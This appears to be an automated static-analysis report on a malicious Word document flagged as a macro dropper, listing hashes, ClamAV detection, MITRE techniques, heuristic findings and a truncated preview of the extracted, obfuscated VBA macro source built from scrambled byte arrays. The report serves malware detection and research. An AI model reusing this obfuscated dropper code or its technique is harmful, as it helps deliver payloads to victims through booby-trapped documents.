Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 19dc9b93870ddc3b…

MALICIOUS

Office (OLE)

Size: 86.0 KB
Created: 2018-09-02 19:19:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 9da89a3c06b501fe1dec98009489be4e
SHA-1: 57b3ccd57408111ef723181fc75204cf247eaadb
SHA-256: 19dc9b93870ddc3beb7fdeea2980c95edc489040e39381d89d0dfe0a825a1570
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6968773-0. High-severity heuristics indicate the presence of VBA macros, a GetObject call, and a CallByName call, all common in malicious documents. The VBA macro code, though truncated, suggests it is designed to download and execute a secondary payload, likely from a URL. The presence of VBA macros points to the T1059.005 (Visual Basic) technique, and the overall nature of malicious documents suggests T1566.001 (Spearphishing Attachment) as the likely initial access vector.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6968773-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6968773-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 22287 bytes
SHA-256: 13eb5f5ed91d32c817262759c9d51e13b873162aa38d5d87a3e5fa1e9f0bd2cf

Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Layout, 0, 0, MSForms, Frame"
Dim else36, else11(2) As Byte, else94(9) As Byte, else63(32) As Byte, else53(19) As Byte, else47(13) As Byte, else2(5) As Byte, else02(55) As Byte, else39(882) As Byte, else18(5) As Byte
Private Sub else82()
else18(4) = 5
else18(0) = 218
else18(5) = 211
else18(3) = 255
else18(1) = 211
else18(2) = 1
End Sub
Private Sub else03()
else63(19) = 59
else63(6) = 231
else63(5) = 219
else63(29) = 25
else63(4) = 22
else63(31) = 197
else63(17) = 252
else63(25) = 152
else63(2) = 10
else63(13) = 80
else63(12) = 103
else63(7) = 20
else63(15) = 146
else63(9) = 120
else63(0) = 238
else63(27) = 69
else63(3) = 243
else63(28) = 79
else63(16) = 241
else63(22) = 82
else63(26) = 100
else63(23) = 115
else63(32) = 170
else63(11) = 77
else63(18) = 46
else63(30) = 176
else63(20) = 29
else63(24) = 139
else63(10) = 252
else63(1) = 200
else63(8) = 201
else63(14) = 171
else63(21) = 252
End Sub
Private Sub else72()
else94(5) = 223
else94(3) = 233
else94(6) = 253
else94(0) = 202
else94(1) = 201
else94(7) = 3
else94(9) = 125
else94(4) = 38
else94(2) = 11
else94(8) = 156
End Sub
Private Sub else16()
else39(306) = 135
else39(793) = 18
else39(816) = 190
else39(740) = 212
else39(496) = 192
else39(216) = 86
else39(753) = 246
else39(233) = 109
else39(735) = 155
else39(874) = 154
else39(722) = 174
else39(619) = 74
else39(70) = 18
else39(716) = 211
else39(659) = 129
else39(248) = 181
else39(447) = 103
else39(377) = 152
else39(359) = 121
else39(583) = 14
else39(482) = 118
else39(108) = 167
else39(790) = 157
else39(614) = 166
else39(392) = 24
else39(376) = 110
else39(462) = 47
else39(228) = 248
else39(33) = 134
else39(243) = 191
else39(528) = 155
else39(107) = 177
else39(843) = 189
else39(487) = 111
else39(468) = 224
else39(433) = 4
else39(343) = 221
else39(448) = 250
else39(423) = 163
else39(439) = 227
else39(465) = 254
else39(455) = 149
else39(160) = 249
else39(837) = 254
else39(840) = 163
else39(566) = 109
else39(196) = 89
else39(489) = 74
else39(661) = 159
else39(408) = 150
else39(559) = 25
else39(159) = 76
else39(200) = 69
else39(691) = 249
else39(869) = 70
else39(156) = 229
else39(675) = 32
else39(205) = 92
else39(413) = 195
else39(683) = 253
else39(829) = 76
else39(621) = 20
else39(545) = 4
else39(491) = 158
else39(339) = 46
else39(654) = 227
else39(132) = 219
else39(8) = 176
else39(510) = 138
else39(212) = 40
else39(394) = 220
else39(719) = 250
else39(167) = 97
else39(189) = 146
else39(663) = 83
else39(138) = 176
else39(449) = 66
else39(83) = 240
else39(875) = 203
else39(323) = 60
else39(202) = 65
else39(758) = 155
else39(139) = 250
else39(253) = 29
else39(34) = 173
else39(581) = 58
else39(541) = 4
else39(399) = 20
else39(689) = 147
else39(383) = 208
else39(546) = 175
else39(99) = 143
else39(113) = 64
else39(398) = 120
else39(733) = 18
else39(177) = 37
else39(179) = 204
else39(309) = 221
else39(264) = 133
else39(327) = 20
else39(164) = 226
else39(772) = 30
else39(30) = 240
else39(112) = 151
else39(67) = 242
else39(48) = 186
else39(232) = 196
else39(157) = 136
else39(620) = 30
else39(778) = 114
else39(644) = 146
else39(220) = 219
else39(525) = 141
else39(4) = 94
else39(178) = 94
else39(766) = 221
else39(511) = 129
else39(403) = 141
else39(866) = 176
else39(587) = 31
else39(574) = 211
else39(55) = 36
else39(173) = 35
else39(49) = 241
else39(77) = 7
else39(609) = 199
else39(330) = 177
else39(685) = 234
else39(364) = 215
else39(863) = 232
else39(791) = 143
else39(41) = 220
else39(536) = 61
else39(803) = 90
else39(276) = 216
else39(601) = 184
else39(503) = 91
else39(430) = 104
else39(678) = 36
else39(785) = 117
else39(145) = 247
else
... (truncated)